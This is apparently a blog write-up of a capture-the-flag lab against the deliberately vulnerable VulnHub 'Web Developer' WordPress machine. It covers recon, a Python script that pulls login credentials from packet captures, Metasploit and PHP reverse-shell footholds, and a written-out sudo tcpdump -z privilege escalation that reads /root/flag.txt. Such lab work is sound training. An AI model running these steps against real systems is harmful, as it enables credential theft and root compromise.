Network Penetration CTF Practice: Obtain the flag in the target machine Web Developer file /root/flag.txt

Purpose of the experiment: By working through the compromise of a target machine, understand the CTF competition format and the areas of knowledge CTF covers (MISC, PPC, WEB and so on), strengthen teamwork through practice, and acquire basic hands-on CTF and information-gathering skills. Become familiar with the tools used for network scanning, probing HTTP web services, directory enumeration, privilege escalation, extracting information from images, password cracking and related tasks.

System environment: Kali Linux 2, WebDeveloper target source: Vulnerable By Design ~ VulnHub 

Experimental tools: no limit

Experimental steps and content:

Purpose: Get the flag in the target machine Web Developer file /root/flag.txt

Basic idea: scan the local network segment for live hosts (netdiscover); port and service scan (Nmap); browse the HTTP service; enumerate the website directories (Dirb); discover the packet capture file ("cap"); analyze the capture to recover the website backend account and password; exploit a vulnerable plugin; use that foothold to obtain a server account and password; log in to the server over SSH; abuse tcpdump (allowed via sudo) to read the flag.

Implementation details are as follows:

1. Discover the target with netdiscover and find the IP address of WebDeveloper. Screenshot.

2. Use Nmap to scan the target host, discover its open ports and the state of its services, take a screenshot and explain which services the target provides. (Uses knowledge points from the first experiment.)

SSH service: Secure Shell (SSH) is an application-layer network protocol standardized by the IETF (Internet Engineering Task Force). It was designed to secure remote login sessions (including from Windows to a Linux server, for file transfer as well as shell access) and other network services. All transmitted data is encrypted, and host-key authentication of the server protects against man-in-the-middle attacks such as DNS or IP spoofing, provided the client actually verifies the host key. Optionally the data can be compressed, which speeds up transfers on slow links. SSH is now standard on Linux systems.
HTTP service: HTTP (HyperText Transfer Protocol) is an application-layer protocol in the TCP/IP suite and defines the rules a client must follow when talking to a server: how web browsers and web servers exchange data, and the format of that data. It relies on TCP underneath for reliable transport.

3. If the target host provides an HTTP service, try to open the target website in a browser. Screenshot. Is there any useful information?

Entering the target IP in the browser opens the site, but nothing useful is found on it.

4. Use whatweb to identify the CMS used by the target website. Screenshot. Which CMS does the analysis show?

The scan shows that the CMS is WordPress, version 4.9.8.

5. Look up wpscan online and briefly describe its functions.

WPScan is a black-box WordPress vulnerability scanner that lets WordPress site owners and developers scan their sites and find and fix issues before an attacker exploits them.

  • WPScan is a vulnerability scanner shipped with Kali Linux by default. It is written in Ruby and checks WordPress sites for security vulnerabilities in WordPress core, plugins and themes. Its database contains more than 18,000 plugin vulnerabilities and 2,600 theme vulnerabilities and supports the latest WordPress release. Besides scanning sensitive files such as robots.txt, it also detects the currently enabled plugins and other features.
  • The scanner can enumerate site usernames, list all installed plugins and themes (flagging the vulnerable ones and providing vulnerability details), and brute-force usernames and passwords on sites that do not protect the login page.
  • WPScan comes pre-installed on several penetration-testing Linux distributions, including Kali Linux.

6. Use Dirb to brute-force the website directories. (Dirb is a tool dedicated to directory brute-forcing and is installed by default in Kali; similar tools include patator, dirsearch and DirBuster, and the Chinese tool Yujian.) Screenshot. Find a directory (path) that appears to be related to network traffic.

7. Browse to that directory (path) and find a cap file. Screenshot.

8. Use Wireshark to analyze the packet capture and follow the TCP data stream. Any useful information? Screenshot.

Filter the packets by request method so that only POST requests are shown (display filter http.request.method == "POST"). The login form fields are visible in the packet details; right-click the field description to copy the account and password.

The account and password recovered from the capture are:

web developer
MasterOfTheUniverse
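The Wireshark step above filters on POST requests and copies the credentials out of the packet details by hand. As an added example (not part of the original write-up), the following Python script does the same job offline: it reads a classic libpcap file, reassembles each TCP flow in sequence order and URL-decodes the log/pwd fields of every POST to wp-login.php, so it also handles a login whose headers and body were split across two segments. The capture it parses is constructed inside the script with made-up addresses (10.0.0.5 and 10.0.0.80) and made-up credentials (alice / Sup3r!Secret&more); the real .cap file downloaded from the target can be passed to extract_wp_logins() instead.

```python
"""Recover WordPress login credentials from an HTTP packet capture.

Added example (not from the original write-up): a pure-Python reader for classic
libpcap files (Ethernet/IPv4/TCP only; no pcapng, no IP fragments) that reassembles
each TCP flow in sequence order and pulls the log/pwd fields out of every POST to
wp-login.php. The sample capture is constructed in code with made-up credentials.
"""
import struct
from urllib.parse import parse_qs

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6


def iter_pcap_frames(data: bytes):
    """Yield link-layer frames from a libpcap file, honouring its byte order."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None or struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("need a classic libpcap file with Ethernet (linktype 1) frames")
    pos = 24
    while pos + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[pos:pos + 16])[2]
        pos += 16
        yield data[pos:pos + incl_len]
        pos += incl_len


def tcp_segment(frame: bytes):
    """Return (flow_key, seq, payload) for an Ethernet/IPv4/TCP frame carrying data, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    if ip[9] != PROTO_TCP or len(tcp) < 20:
        return None
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    payload = tcp[(tcp[12] >> 4) * 4:]          # data offset is the high nibble, in 32-bit words
    if not payload:
        return None
    src, dst = (".".join(map(str, ip[o:o + 4])) for o in (12, 16))
    return (src, sport, dst, dport), seq, payload


def reassemble_flows(pcap: bytes) -> dict:
    """Join each one-way TCP flow's payload in sequence order; retransmits collapse on seq."""
    flows = {}
    for frame in iter_pcap_frames(pcap):
        if seg := tcp_segment(frame):
            key, seq, payload = seg
            flows.setdefault(key, {})[seq] = payload
    return {k: b"".join(segs[s] for s in sorted(segs)) for k, segs in flows.items()}


def extract_wp_logins(pcap: bytes) -> list:
    """Return [(client_ip, "server:port", username, password)] for each POST to wp-login.php."""
    found = []
    for (src, _sport, dst, dport), stream in reassemble_flows(pcap).items():
        pos = 0
        while (idx := stream.find(b"POST ", pos)) >= 0:
            head_end = stream.find(b"\r\n\r\n", idx)
            if head_end < 0:
                break
            request_line, *header_lines = stream[idx:head_end].decode("latin-1").split("\r\n")
            headers = {k.strip().lower(): v.strip()
                       for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
            body_start = head_end + 4
            length = int(headers.get("content-length", "0"))
            body = stream[body_start:body_start + length]
            pos = body_start + length            # continue after this request (keep-alive streams)
            parts = request_line.split(" ")
            if len(parts) >= 2 and parts[1].split("?")[0].endswith("/wp-login.php"):
                form = parse_qs(body.decode("latin-1"))   # URL-decodes %21, '+' and friends
                if form.get("log"):
                    found.append((src, f"{dst}:{dport}", form["log"][0], form.get("pwd", [""])[0]))
    return found


def _frame(src, sport, dst, dport, seq, payload):
    """Build an Ethernet/IPv4/TCP frame for the sample capture (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, PROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00\x0c\x29\x11\x22\x33\x00\x50\x56\x44\x55\x66" + struct.pack("!H", ETHERTYPE_IPV4) + ip


def build_sample_pcap() -> bytes:
    """Constructed capture: one login POST whose headers and body arrive in separate segments."""
    body = b"log=alice&pwd=Sup3r%21Secret%26more&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1"
    head = (b"POST /wp-login.php HTTP/1.1\r\nHost: wp.example\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n" % len(body))
    client, server, seq = "10.0.0.5", "10.0.0.80", 1000
    frames = [_frame(client, 51000, server, 80, seq, head),
              _frame(client, 51000, server, 80, seq + len(head), body),
              _frame(server, 80, client, 51000, 5000, b"HTTP/1.1 302 Found\r\nContent-Length: 0\r\n\r\n")]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return header + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


if __name__ == "__main__":
    for client, server, user, pwd in extract_wp_logins(build_sample_pcap()):
        print(f"{client} -> {server}: user={user!r} password={pwd!r}")
```

To use it on the target's capture, call extract_wp_logins(open("file.cap", "rb").read()). The point the capture makes is that a WordPress login over plain HTTP puts the password on the wire verbatim, which is why wp-login.php and the whole admin area should only be served over HTTPS.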

9. Use the information obtained in the previous step to log in to the website backend. Screenshot.

(The website administrator account and the operating-system account are different concepts.)

10. Exploit the (plugin) vulnerability in the CMS.

11. Use the plugin vulnerability to gain code execution on the server, moving from website administrator to a shell on the host.

Option 1: Metasploit plus the Reflex Gallery plugin vulnerability. Install the Reflex Gallery plugin and exploit its known vulnerability (an arbitrary file upload). (Textbook knowledge point.)

After the session is established, read wp-config.php to obtain the account and password. (Configuration files matter; this applies to the configuration files of all kinds of systems.)

Which target are the obtained account and password used to access? Compare with the note made after logging in to the website backend above.

Open msfconsole and run search reflexgallery to find the module path (exploit/unix/webapp/wp_reflexgallery_file_upload); its rank of excellent indicates a reliable exploit.

Then configure the module: select it with use, set RHOSTS to the target machine's IP, and run exploit to obtain a session on the target website.

Run pwd to see the current directory, cd to /var/www/html, and ls to list its contents; the wp-config.php file is there.

It contains the database username and password (DB_USER / DB_PASSWORD), which on this target also serve as the system account password.

Option 2: Upload a reverse shell.

php-reverse-shell | pentestmonkey

Download the PHP file from the above site.

Purpose: PHP website penetration. Method: after uploading it to the website, access (include) the reverse-shell page via its URL.

Function: the script initiates a reverse TCP connection back to the attacker (the attacker's IP address and port are hard-coded in the script).

The CMS is written in PHP, so a PHP reverse shell works, but the IP address and port initialised at the top of the script must be changed to point at the attacker.

Change the IP to the attacker's IP. The port is arbitrary; here port 444 is used for listening.

In the backend, open any PHP page of the active theme (Appearance > Theme Editor) and replace its code with the php-reverse-shell.php code.

Copy and paste the whole script:

The attacker starts an nc listener in Kali and then visits the modified PHP page in the browser; this yields a reverse shell running as user www-data. After the session is established, read wp-config.php to obtain the account and password (note the path).

Listen with nc; note that the port is 444 (the listening port set earlier).

Then visit 192.168.187.131/wp-content/themes/twentysixteen/404.php, the PHP page modified above. Back in Kali, the listener shows the connection.

Next, cd /var/www/html, ls to list the files (wp-config.php is among them) and read it with cat.

The database credentials in it double as the system account password.

Option 3: Exploit the File Manager plugin.

After installing the plugin, wp-config.php can be browsed directly.

Choose one of the three options above (or another workable approach) and take screenshots of the steps.

12. SSH login to the server

Try to connect to the remote server over SSH with the username and password obtained in the previous step (the database credentials from wp-config.php). Screenshot.

12.1 Try to view /root/flag.txt and replace the screenshot below with the result of the following operation.

ssh webdeveloper@targetip


The file cannot be read: the webdeveloper user has no permission on /root/flag.txt.

13. Use tcpdump to execute arbitrary commands (tcpdump runs the program given with -z every time it rotates the capture file, so a one-second rotation is enough to trigger it).

Check which commands the current user is allowed to run with sudo (sudo -l).

It turns out that tcpdump can be run as root via sudo.

Create the helper script at /tmp/exploit (a plain shell script that reads the flag, not shellcode):

echo '#!/bin/sh' > /tmp/exploit
echo 'cat /root/flag.txt' >> /tmp/exploit

Grant executable permissions:

chmod +x /tmp/exploit

Use tcpdump to execute it as root:

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

Rotation is only checked when a packet is captured, so if nothing appears after a second, generate some traffic to eth0 (for example ping the target from Kali).

Get the flag. Congratulations!

Detailed explanation of the tcpdump command:

-i eth0 captures packets on the specified network interface

-w /dev/null writes the captured packets to the null device (we do not want the packets themselves)

-z [command] runs the specified command after each file rotation; tcpdump appends the rotated file name as the command's argument, which is why -z only has an effect together with -G or -C

-Z [user] is the user tcpdump switches to before opening the first savefile; Debian-based builds default to the unprivileged tcpdump user, so -Z root keeps the post-rotate command running as root

-G [rotate_seconds] rotates the dump file specified by -w every rotate_seconds seconds (the check happens when a packet arrives)

-W [num] limits the number of rotated files created; together with -G, tcpdump exits after num rotations (it is not a packet count)

Experiment summary

Through this experiment we reviewed material covered earlier and saw that there are many ways to reach the goal, not just the three above, which encourages lateral thinking and learning how to handle different approaches. I also practised commonly used Kali tools and became more comfortable with the commands, from simple msf commands to basics such as cd, pwd, ls and cat. I gained some understanding of configuration files, the danger of unencrypted (plaintext) data, and vulnerability exploitation: the weakness is not necessarily in the application itself but may lie in external components such as plugins. In short, we learned a lot from this section.

Origin: blog.csdn.net/yellowO/article/details/135237113